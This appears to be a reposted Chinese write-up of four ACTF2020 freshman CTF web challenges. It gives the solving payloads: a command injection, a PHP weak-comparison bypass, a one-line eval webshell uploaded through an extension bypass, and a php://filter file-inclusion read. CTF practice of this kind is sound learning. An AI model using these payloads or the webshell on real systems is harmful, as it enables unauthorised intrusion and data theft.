[ACTF2020 新生赛]WEB汇总
Posted lee-404
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[ACTF2020 新生赛]WEB汇总相关的知识,希望对你有一定的参考价值。
写在前边
这只是解题套路的汇总文,相关的知识点后续填坑(下次一定)
所有环境在BUUCTF上可复现
1.Exec
访问看到这样页面。想到命令注入,输入
127.0.0.1;
无报错回显,说明无WAF,直接用截断符号配合普通命令
127.0.0.1;cat flag.txt
2.BackupFile
根据题目意思,网站存在备份文件
index.php.bak
打开查看源码
<?php include_once "flag.php"; if(isset($_GET[‘key‘])) { $key = $_GET[‘key‘]; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key); $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3"; if($key == $str) { echo $flag; } } else { echo "Try to find out source file!"; }
if 后面的==是弱相等;这里的字符型被转换成了整型,传入key=123
3.Upload
访问页面。鼠标滑过电灯泡发现灯泡点亮有个文件上传,传入一句话木马
<?php @eval($_POST[‘233‘]) ?>
有WAF,将木马改成.jpg格式,上传抓包改成.phtml格式
菜刀连接
4.Include
很明显的文件包含
?file=php://filter/convert.base64-encode/resource=flag.php
获得直接获得flag.php的Base64
解码
以上知识点后续的会在漏洞原理补充
以上是关于[ACTF2020 新生赛]WEB汇总的主要内容,如果未能解决你的问题,请参考以下文章
Buuctf-Web-[ACTF2020 新生赛]Include